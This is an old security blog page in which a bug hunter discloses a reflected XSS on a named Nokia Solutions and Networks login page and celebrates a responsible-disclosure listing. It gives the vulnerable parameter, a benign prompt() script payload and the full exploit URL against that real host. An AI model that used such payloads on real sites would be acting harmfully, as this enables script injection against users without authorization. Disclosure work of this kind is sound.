KeralaCyberSquad-India

Showing posts with label Nokia Solutions and Networks. Show all posts
Showing posts with label Nokia Solutions and Networks. Show all posts

Monday, December 23, 2013

Nokia Solutions and Networks reflected XSS


Nokia Solutions and Networks reflected XSS 



 Hello Geeks ,

Here is the POC of a Reflected XSS that I have found on Nokia Solutions and Network's domain https://rctool.access.nsn.com


[+] Vulnerable URL = https://rctool.access.nsn.com
[+] Vulnerable parameter =  err
[+] Payload used =  <SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] URL with malicious Payload= https://rctool.access.nsn.com/login.asp?login=false&err=<SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] Reported
[+] Duplicated
[+] Still Unfixed



Praveen Nair
Kerala Cyber Squad - India

Friday, December 20, 2013

Got listed in Nokia Solutions and Networks's Responsible Disclosure list

Got listed in Nokia Solutions and Networks's Responsible Disclosure list



We are proud to make you aware about one more achievement by our Team - Kerala Cyber Squad - India have Got listed in Nokia Solutions and Networks's Responsible Disclosure list

http://nsn.com/responsible-disclosure

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)